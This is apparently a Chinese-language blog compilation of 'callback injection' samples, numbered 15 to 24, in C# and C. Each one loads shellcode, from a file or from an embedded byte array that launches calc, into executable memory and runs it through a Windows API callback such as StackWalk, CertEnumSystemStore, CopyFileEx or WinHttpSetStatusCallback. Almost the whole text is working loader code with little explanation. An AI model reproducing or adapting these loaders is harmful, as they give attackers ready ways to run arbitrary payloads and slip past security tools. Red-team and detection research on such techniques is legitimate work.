84 [DllImport("kernel32.dll")]
85 static extern int SleepEx(
86 UInt32 dwMilliseconds,
87 bool bAlertable);
88 }
89}
15.回调函数注入 (C#) 通过 StackWalk
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace StackWalk9{10 internal class Program11 {12 static void Main(string[] args)13 {14 if (args.Length < 1)15 {16 Console.WriteLine("\nNo shellcode specified.");17 Console.WriteLine("Example Usage: StackWalk.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");18 System.Environment.Exit(1);19 }2021 byte[] payload = System.IO.File.ReadAllBytes(args[0]);2223 IntPtr hAlloc = VirtualAlloc(24 IntPtr.Zero,25 (uint)payload.Length,26 0x1000 /*COMMIT*/,27 0x40 /*RWX*/);2829 Marshal.Copy(payload, 0, hAlloc, payload.Length);3031 uint oldProtect;32 VirtualProtectEx(33 Process.GetCurrentProcess().Handle,34 hAlloc,35 payload.Length,36 0x20, //RX37 out oldProtect);383940 uint IMAGE_FILE_MACHINE_AMD64 = 0x8664;41 STACKFRAME sStackFrame = new STACKFRAME();42 CONTEXT64 sContext = new CONTEXT64();4344 StackWalk(IMAGE_FILE_MACHINE_AMD64, Process.GetCurrentProcess().Handle, IntPtr.Zero, ref sStackFrame, ref sContext, IntPtr.Zero, hAlloc, IntPtr.Zero, IntPtr.Zero);4546 }4748 [DllImport("kernel32")]49 static extern IntPtr VirtualAlloc(50 IntPtr lpAddress,51 uint dwSize,52 uint flAllocationType,53 uint flProtect);5455 [DllImport("kernel32.dll")]56 static extern bool VirtualProtectEx(57 IntPtr hProcess,58 IntPtr lpAddress,59 int dwSize,60 uint flNewProtect,61 out uint lpflOldProtect);6263 [DllImport("DbgHelp.dll")]64 static extern bool StackWalk(65 uint MachineType,66 IntPtr hProcess,67 IntPtr hThread,68 ref STACKFRAME StackFrame,69 ref CONTEXT64 ContextRecord,70 IntPtr ReadMemoryRoutine,71 IntPtr FunctionTableAccessRoutine,72 IntPtr GetModuleBaseRoutine,73 IntPtr TranslateAddress);7475 public enum CONTEXT_FLAGS : uint76 {77 CONTEXT_i386 = 0x10000,78 CONTEXT_i486 = 0x10000, // same as i38679 CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP80 CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI81 CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS82 CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state83 CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,784 CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions85 CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,86 CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS87 }8889 [StructLayout(LayoutKind.Sequential)]90 public struct FLOATING_SAVE_AREA91 {92 public uint ControlWord;93 public uint StatusWord;94 public uint TagWord;95 public uint ErrorOffset;96 public uint ErrorSelector;97 public uint DataOffset;98 public uint DataSelector;99 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
100 public byte[] RegisterArea;
101 public uint Cr0NpxState;
102 }
103
104 [StructLayout(LayoutKind.Sequential)]
105 public struct CONTEXT
106 {
107 public uint ContextFlags; //set this to an appropriate value
108 // Retrieved by CONTEXT_DEBUG_REGISTERS
109 public uint Dr0;
110 public uint Dr1;
111 public uint Dr2;
112 public uint Dr3;
113 public uint Dr6;
114 public uint Dr7;
115 // Retrieved by CONTEXT_FLOATING_POINT
116 public FLOATING_SAVE_AREA FloatSave;
117 // Retrieved by CONTEXT_SEGMENTS
118 public uint SegGs;
119 public uint SegFs;
120 public uint SegEs;
121 public uint SegDs;
122 // Retrieved by CONTEXT_INTEGER
123 public uint Edi;
124 public uint Esi;
125 public uint Ebx;
126 public uint Edx;
127 public uint Ecx;
128 public uint Eax;
129 // Retrieved by CONTEXT_CONTROL
130 public uint Ebp;
131 public uint Eip;
132 public uint SegCs;
133 public uint EFlags;
134 public uint Esp;
135 public uint SegSs;
136 // Retrieved by CONTEXT_EXTENDED_REGISTERS
137 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
138 public byte[] ExtendedRegisters;
139 }
140
141 // Next x64
142
143 [StructLayout(LayoutKind.Sequential)]
144 public struct M128A
145 {
146 public ulong High;
147 public long Low;
148
149 public override string ToString()
150 {
151 return string.Format("High:{0}, Low:{1}", this.High, this.Low);
152 }
153 }
154
155 /// <summary>
156 /// x64
157 /// </summary>
158 [StructLayout(LayoutKind.Sequential, Pack = 16)]
159 public struct XSAVE_FORMAT64
160 {
161 public ushort ControlWord;
162 public ushort StatusWord;
163 public byte TagWord;
164 public byte Reserved1;
165 public ushort ErrorOpcode;
166 public uint ErrorOffset;
167 public ushort ErrorSelector;
168 public ushort Reserved2;
169 public uint DataOffset;
170 public ushort DataSelector;
171 public ushort Reserved3;
172 public uint MxCsr;
173 public uint MxCsr_Mask;
174
175 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
176 public M128A[] FloatRegisters;
177
178 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
179 public M128A[] XmmRegisters;
180
181 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
182 public byte[] Reserved4;
183 }
184
185 /// <summary>
186 /// x64
187 /// </summary>
188 [StructLayout(LayoutKind.Sequential, Pack = 16)]
189 public struct CONTEXT64
190 {
191 public ulong P1Home;
192 public ulong P2Home;
193 public ulong P3Home;
194 public ulong P4Home;
195 public ulong P5Home;
196 public ulong P6Home;
197
198 public CONTEXT_FLAGS ContextFlags;
199 public uint MxCsr;
200
201 public ushort SegCs;
202 public ushort SegDs;
203 public ushort SegEs;
204 public ushort SegFs;
205 public ushort SegGs;
206 public ushort SegSs;
207 public uint EFlags;
208
209 public ulong Dr0;
210 public ulong Dr1;
211 public ulong Dr2;
212 public ulong Dr3;
213 public ulong Dr6;
214 public ulong Dr7;
215
216 public ulong Rax;
217 public ulong Rcx;
218 public ulong Rdx;
219 public ulong Rbx;
220 public ulong Rsp;
221 public ulong Rbp;
222 public ulong Rsi;
223 public ulong Rdi;
224 public ulong R8;
225 public ulong R9;
226 public ulong R10;
227 public ulong R11;
228 public ulong R12;
229 public ulong R13;
230 public ulong R14;
231 public ulong R15;
232 public ulong Rip;
233
234 public XSAVE_FORMAT64 DUMMYUNIONNAME;
235
236 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
237 public M128A[] VectorRegister;
238 public ulong VectorControl;
239
240 public ulong DebugControl;
241 public ulong LastBranchToRip;
242 public ulong LastBranchFromRip;
243 public ulong LastExceptionToRip;
244 public ulong LastExceptionFromRip;
245 }
246
247 public struct STACKFRAME
248 {
249 public IntPtr AddrPC;
250 public IntPtr AddrReturn;
251 public IntPtr AddrFrame;
252 public IntPtr AddrStack;
253 public IntPtr FuncTableEntry;
254 public uint Params;
255 public bool Far;
256 public bool Virtual;
257 public uint Reserved;
258 public IntPtr KDHELP64;
259 public IntPtr AddrBStore;
260 }
261 }
262}
16.回调函数注入 (C#) 通过 SymRegisterCallback
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace SymRegisterCallback9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: SymRegisterCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hProcess = Process.GetCurrentProcess().Handle;
40 SymInitialize(hProcess, String.Empty, false);
41 SymRegisterCallback(hProcess, hAlloc, IntPtr.Zero);
42 SymRefreshModuleList(hProcess);
43 }
44
45 [DllImport("kernel32")]
46 static extern IntPtr VirtualAlloc(
47 IntPtr lpAddress,
48 uint dwSize,
49 uint flAllocationType,
50 uint flProtect);
51
52 [DllImport("kernel32.dll")]
53 static extern bool VirtualProtectEx(
54 IntPtr hProcess,
55 IntPtr lpAddress,
56 int dwSize,
57 uint flNewProtect,
58 out uint lpflOldProtect);
59
60 [DllImport("DbgHelp.dll")]
61 static extern bool SymInitialize(
62 IntPtr hProcess,
63 string UserSearchPath,
64 bool fInvadeProcess);
65
66 [DllImport("DbgHelp.dll")]
67 static extern bool SymRegisterCallback(
68 IntPtr hProcess,
69 IntPtr hCallback,
70 IntPtr UserContext);
71
72 [DllImport("DbgHelp.dll")]
73 static extern bool SymRefreshModuleList(IntPtr hProcess);
74 }
75}
17.回调函数注入 (C#) 通过 WinHttpSetStatusCallback
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace WinHttpSetStatusCallback9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: WinHttpSetStatusCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 uint WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0;
40 string WINHTTP_NO_PROXY_NAME = null;
41 string WINHTTP_NO_PROXY_BYPASS = null;
42
43 IntPtr hSession = WinHttpOpen(null, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
44
45 uint WINHTTP_CALLBACK_FLAG_ALL_NOTIFICATIONS = 0xFFFFFFFF;
46 WinHttpSetStatusCallback(hSession, hAlloc, WINHTTP_CALLBACK_FLAG_ALL_NOTIFICATIONS, IntPtr.Zero);
47
48 WinHttpConnect(hSession, "localhost", 80, 0);
49 }
50
51 [DllImport("kernel32")]
52 static extern IntPtr VirtualAlloc(
53 IntPtr lpAddress,
54 uint dwSize,
55 uint flAllocationType,
56 uint flProtect);
57
58 [DllImport("kernel32.dll")]
59 static extern bool VirtualProtectEx(
60 IntPtr hProcess,
61 IntPtr lpAddress,
62 int dwSize,
63 uint flNewProtect,
64 out uint lpflOldProtect);
65
66 [DllImport("Winhttp.dll", SetLastError = true)]
67 static extern IntPtr WinHttpOpen(
68 string pszAgent,
69 uint dwAccessType,
70 string pszProxyW,
71 string pszProxyBypass,
72 uint dwFlags);
73
74 [DllImport("Winhttp.dll", SetLastError = true)]
75 static extern IntPtr WinHttpSetStatusCallback(
76 IntPtr hInternet,
77 IntPtr lpfnInternetCallback,
78 uint dwNotificationFlags,
79 IntPtr dwReserved);
80
81 [DllImport("winhttp.dll", SetLastError = true)]
82 static extern IntPtr WinHttpConnect(IntPtr hSession,
83 string pswzServerName,
84 short nServerPort,
85 int dwReserved);
86
87 }
88}
18.回调函数注入 通过 CDefFolderMenu_Create2
1// Wra7h/FlavorTown2// Written/Compiled: Visual Studio 20223// Usage: this.exe <shellcode file>4#pragma comment(lib, "Shell32.lib")56#include <stdio.h>7#include <Windows.h>8#include <shlobj_core.h>9
10BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
11
12INT wmain(INT argc, WCHAR* argv[])
13{
14 BOOL Ret = FALSE;
15 DWORD SCLen = 0;
16 PCHAR Shellcode = NULL;
17
18 if (argc != 2)
19 {
20 printf("Usage: CDefFolderMenu_Create2.exe C:\\Path\\To\\Shellcode.bin");
21 goto CLEANUP;
22 }
23
24 //Read shellcode and setup
25 Ret = ReadContents(argv[1], &Shellcode, &SCLen);
26 if (!Ret)
27 goto CLEANUP;
28
29 PVOID hAlloc = VirtualAlloc(NULL, SCLen,
30 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
31
32 memcpy(hAlloc, Shellcode, SCLen);
33
34 PVOID ICM = NULL;
35 CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)hAlloc, 0, NULL, &ICM);
36
37CLEANUP:
38 if (Shellcode)
39 free(Shellcode);
40
41 return 0;
42}
43
44BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
45{
46 FILE* f = NULL;
47 _wfopen_s(&f, Filepath, L"rb");
48 if (f)
49 {
50 fseek(f, 0, SEEK_END);
51 *BufferSize = ftell(f);
52 fseek(f, 0, SEEK_SET);
53 *Buffer = malloc(*BufferSize);
54 fread(*Buffer, *BufferSize, 1, f);
55 fclose(f);
56 }
57
58 return (*BufferSize != 0) ? TRUE : FALSE;
59}
19.回调函数注入 通过 CertEnumSystemStore
1#include <windows.h>2#include <stdio.h>3#include <wincrypt.h>45// Requires Crypt32.lib67// alfarom256 calc shellcode8unsigned char op[] =9"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
10"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
11"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
12"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
13"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
14"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
15"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
16"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
17"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
18"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
19"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
20"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
21"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
22"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
23"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
24"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
25"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
26"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
27"\x63\x2e\x65\x78\x65\x00";
28
29
30
31int main() {
32
33
34 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
35 ::RtlMoveMemory(addr, op, sizeof(op));
36
37 ::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr);
38
39
40}
20.回调函数注入 通过 CertEnumSystemStoreLocation
1#include <windows.h>2#include <stdio.h>3#include <wincrypt.h>45// requires Crypt32.lib678// alfarom256 calc shellcode9unsigned char op[] =
10"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
11"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
12"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
13"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
14"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
15"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
16"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
17"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
18"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
19"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
20"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
21"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
22"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
23"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
24"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
25"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
26"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
27"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
28"\x63\x2e\x65\x78\x65\x00";
29
30
31
32int main() {
33
34
35 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
36 ::RtlMoveMemory(addr, op, sizeof(op));
37
38 ::CertEnumSystemStoreLocation(NULL, nullptr, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)addr);
39
40}
21.回调函数注入 通过 CertFindChainInStore
1// Wra7h/FlavorTown2// Written/Compiled: Visual Studio 20223// Usage: this.exe <shellcode file>4#pragma comment(lib, "Crypt32.lib")56#include <stdio.h>7#include <windows.h>8#include <wincrypt.h>9
10BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
11
12INT wmain(INT argc, WCHAR* argv[])
13{
14 BOOL Ret = FALSE;
15 DWORD SCLen = 0;
16 PCHAR Shellcode = NULL;
17
18 HCERTSTORE hCertStore = NULL;
19 CERT_CHAIN_FIND_ISSUER_PARA sCCFIP = { 0 };
20
21 if (argc != 2)
22 {
23 printf("Usage: CertFindChainInStore.exe C:\\Path\\To\\Shellcode.bin");
24 goto CLEANUP;
25 }
26
27 Ret = ReadContents(argv[1], &Shellcode, &SCLen);
28 if (!Ret)
29 goto CLEANUP;
30
31 PVOID hAlloc = VirtualAlloc(NULL, SCLen,
32 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
33
34 memcpy(hAlloc, Shellcode, SCLen);
35
36 hCertStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, L"My");
37
38 sCCFIP.pfnFindCallback = (PFN_CERT_CHAIN_FIND_BY_ISSUER_CALLBACK)hAlloc;
39 sCCFIP.cbSize = sizeof(CERT_CHAIN_FIND_ISSUER_PARA);
40
41 CertFindChainInStore(hCertStore, X509_ASN_ENCODING, 0, CERT_CHAIN_FIND_BY_ISSUER, &sCCFIP, NULL);
42
43CLEANUP:
44 if (Shellcode)
45 free(Shellcode);
46
47 if (hCertStore)
48 CertCloseStore(hCertStore, 0);
49
50 return 0;
51}
52
53BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
54{
55 FILE* f = NULL;
56 _wfopen_s(&f, Filepath, L"rb");
57 if (f)
58 {
59 fseek(f, 0, SEEK_END);
60 *BufferSize = ftell(f);
61 fseek(f, 0, SEEK_SET);
62 *Buffer = malloc(*BufferSize);
63 fread(*Buffer, *BufferSize, 1, f);
64 fclose(f);
65 }
66
67 return (*BufferSize != 0) ? TRUE : FALSE;
68}
22.回调函数注入 通过 CopyFile2
1#include <windows.h>2#include <stdio.h>3#include <dpa_dsa.h>456int err(const char* errmsg) {789 printf("Error: %s (%u)\n", errmsg, ::GetLastError());
10 return 1;
11
12}
13
14
15// alfarom256 calc shellcode
16unsigned char op[] =
17"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
18"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
19"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
20"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
21"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
22"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
23"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
24"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
25"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
26"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
27"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
28"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
29"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
30"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
31"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
32"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
33"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
34"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
35"\x63\x2e\x65\x78\x65\x00";
36
37
38
39int main() {
40
41
42 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
43 ::RtlMoveMemory(addr, op, sizeof(op));
44
45 COPYFILE2_EXTENDED_PARAMETERS params;
46
47 params.dwSize = { sizeof(params) };
48 params.dwCopyFlags = COPY_FILE_FAIL_IF_EXISTS;
49 params.pfCancel = FALSE;
50 params.pProgressRoutine = (PCOPYFILE2_PROGRESS_ROUTINE)addr;
51 params.pvCallbackContext = nullptr;
52
53 ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log");
54 ::CopyFile2(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", ¶ms);
55
56}
23.回调函数注入 通过 CopyFileEx
1#include <windows.h>2#include <stdio.h>34// alfarom256 calc shellcode5unsigned char op[] =6"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"7"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"8"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"9"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
10"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
11"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
12"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
13"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
14"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
15"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
16"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
17"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
18"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
19"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
20"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
21"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
22"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
23"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
24"\x63\x2e\x65\x78\x65\x00";
25
26
27
28int main() {
29
30
31 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
32 ::RtlMoveMemory(addr, op, sizeof(op));
33
34 ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log");
35 ::CopyFileExW(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", (LPPROGRESS_ROUTINE)addr, NULL, FALSE, COPY_FILE_FAIL_IF_EXISTS);
36
37}
24.回调函数注入 通过 CopyFileTransacted
1// Wra7h/FlavorTown2// Written/Compiled: Visual Studio 20223// Usage: this.exe <shellcode file>4#pragma comment(lib, "KtmW32.lib")56#include <stdio.h>7#include <windows.h>8#include <ktmw32.h>9
10BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
11
12INT wmain(INT argc, WCHAR* argv[])
13{
14 BOOL Ret = FALSE;
15 DWORD SCLen = 0;
16 PCHAR Shellcode = NULL;
17
18 HANDLE hFile = NULL;
19 HANDLE hTransaction = NULL;
20
21 if (argc != 2)
22 {
23 printf("Usage: CopyFileTransacted.exe C:\\Path\\To\\Shellcode.bin");
24 goto CLEANUP;
25 }
26
27 //Read shellcode and setup
28 Ret = ReadContents(argv[1], &Shellcode, &SCLen);
29 if (!Ret)
30 goto CLEANUP;
31
32 PVOID hAlloc = VirtualAlloc(NULL, SCLen,
33 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
34
35 memcpy(hAlloc, Shellcode, SCLen);
36
37 //Create a file to copy
38 hFile = CreateFile(L"C:\\Windows\\Temp\\Blank.txt", FILE_READ_DATA, FILE_SHARE_READ,
39 NULL, OPEN_ALWAYS, 0, NULL);
40
41 CloseHandle(hFile);
42
43 //Create copy transaction
44 hTransaction = CreateTransaction(NULL, NULL, NULL, NULL, NULL, NULL, NULL);
45
46 CopyFileTransacted(L"C:\\Windows\\Temp\\Blank.txt", L"C:\\Windows\\Temp\\Blankagain.txt",
47 (LPPROGRESS_ROUTINE)hAlloc, NULL, FALSE, 0x0, hTransaction);
48
49 //Execute
50 CommitTransaction(hTransaction);
51
52 //Delete the files
53 DeleteFile(L"C:\\Windows\\Temp\\Blank.txt");
54 DeleteFile(L"C:\\Windows\\Temp\\Blankagain.txt");
55
56CLEANUP:
57 if (Shellcode)
58 free(Shellcode);
59
60 if (hTransaction)
61 CloseHandle(hTransaction);
62
63 return 0;
64}
65
66BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
67{
68 FILE* f = NULL;
69 _wfopen_s(&f, Filepath, L"rb");
70 if (f)
71 {
72 fseek(f, 0, SEEK_END);
73 *BufferSize = ftell(f);
74 fseek(f, 0, SEEK_SET);
75 *Buffer = malloc(*BufferSize);
76 fread(*Buffer, *BufferSize, 1, f);
77 fclose(f);
78 }
79
80 return (*BufferSize != 0) ? TRUE : FALSE;
81}
回调函数注入(Callback Injection)实例汇总相关推荐
- 【转】JS回调函数--简单易懂有实例
JS回调函数--简单易懂有实例 初学js的时候,被回调函数搞得很晕,现在回过头来总结一下什么是回调函数. 我们先来看看回调的英文定义:A callback is a function that is ...
- C语言中的回调函数(Callback Function)
C语言中的回调函数(Callback Function) 1 定义和使用场合 回调函数是指 使用者自己定义一个函数,实现这个函数的程序内容,然后把这个函数(入口地址)作为参数传入别人(或系统)的函数中 ...
- PHP - 回调函数概念与用法实例分析 - 学习/实践
